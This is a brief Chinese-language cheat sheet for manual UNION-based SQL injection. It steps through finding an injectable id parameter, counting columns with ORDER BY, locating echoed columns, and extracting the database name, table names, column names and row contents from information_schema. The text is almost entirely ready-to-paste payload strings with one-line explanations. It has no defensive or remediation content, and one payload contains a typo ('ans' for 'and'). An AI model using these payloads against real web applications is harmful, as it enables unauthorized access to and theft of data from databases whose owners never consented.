判断注入点

id=1 and 1=2

id=27%

判断字段数

id=1 order by 1

可以从1一直往后试，就可以判断出字段数了

判断回显点

id=1 and 1=2 union select *,*,*,……

刚刚的字段数往后面填，可判断出

查询相关内容

id=1 and 1=2 union select 1,database(),3

查询当前数据库名称

id=1 and 1=2 union select 1,table_name,3 from information_schema.tables where table_schema=’****’

查询库的表名

id=1 ans 1=2 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema=‘****’ and table_name=’*****’

查询列名

union select 1,***,3 from ****

查询内容